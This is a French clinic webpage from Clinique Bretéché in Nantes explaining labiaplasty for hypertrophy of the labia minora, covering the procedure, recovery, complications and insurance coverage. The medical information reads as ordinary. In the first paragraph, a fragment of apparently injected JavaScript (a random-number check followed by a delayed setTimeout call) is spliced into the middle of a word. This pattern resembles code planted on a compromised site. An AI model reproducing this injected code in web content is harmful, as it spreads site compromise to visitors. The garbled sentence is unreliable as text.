Une équipe au cœur de votre bien-être

Clinique Bretéché - Nantes

Chirurgie des petites lèvres

Chirurgie des petites lèvres ou nymphoplastie de réduction pour hypertrophie

L’hypertrophie des petites lèvres est caractérisée par une taille excessive de celles-ci notamment par rapport aux grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes lèvres. En position debout, les petites lèvres « tombent » et dépassent la vulve. Les conséquences peuvent n’être qu’esthétique mais souvent cela entraine des gênes vestimentaires ou lors d’activités physiques et parfois lors de rapports sexuels.

La pratique

L’intervention de chirurgie des petites lèvres ou nymphoplastie de réduction pour hypertrophie a pour but de réduire la taille des petites lèvres en corrigeant éventuellement une assymétrie préexistante afin de retrouver une harmonie dans les reliefs vulvaires.

La nymphoplastie de réduction est un geste chirurgical amenant un confort personnel indéniable, mais il ne faut pas minimiser les possibles incidents et complications certes rares mais toujours possibles (hématome, infection, désunion…).

Les suites opératoires et les résultats

Cette intervention relativement simple se déroule sous anesthésie générale en ambulatoire le plus fréquemment. Les suites sont peu douloureuses et les soins simples, la reprise d’activités sportives ou sexuelles peut se faire au bout de 2 à 3 semaines. L’aspect définitif est évalué à 1 ou 2 mois.

La prise en charge

La sécurité sociale peut prendre une partie de l’intervention de nymphoplastie de réduction en charge sous certaines conditions. Le tarif dépend donc de la prise en charge ou non, parfois de votre mutuelle.

Tous ces aspects seront évoqués avec vous lors d’une consultation personnalisée qui sera à même de répondre à toutes vos interrogations.

Dernière modification : 05/11/2014